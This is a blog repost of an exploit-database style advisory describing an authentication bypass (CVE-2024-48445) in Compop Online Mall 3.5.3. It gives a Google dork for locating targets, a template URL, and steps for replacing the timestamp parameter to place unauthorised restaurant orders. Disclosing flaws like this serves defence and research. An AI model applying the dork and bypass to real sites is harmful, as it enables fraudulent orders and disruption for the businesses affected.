Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Compop Online Mall 3.5.3 Authentication Bypass

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 99
# Exploit Title: Compop Online Mall Authentication Bypass
# Google Dork: # Exploit Title: Compop Online Mall Authentication Bypass
# Google Dork: Terms of Use inurl:compop.vip
# Date: 22/12/2024
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445

Vulnerability Overview:
The system uses a Unix timestamp ("ts") parameter in URLs for authentication, which is fundamentally flawed. By changing the timestamp to the current time, an attacker can bypass access controls.

Vulnerable URL Structure:
https://VULNERABLE.COM/Home?rid=11111&tid=1&h5sty=3&et=2&ts=CURRENT_TIMESTAMP

Key Parameters:
rid: Restaurant ID
tid: Table Number
ts: Unix Timestamp (authentication mechanism)

Exploitation Method:
Obtain current Unix timestamp

Linux: date +%s
Windows PowerShell: [int](Get-Date -UFormat %s -Millisecond 0)

Replace "ts" value in URL with current timestamp
Submit modified URL to place unauthorized orders

Impact:
An attacker can place orders for any table by manipulating the timestamp, potentially causing operational disruption for the restaurant.
Social Media Share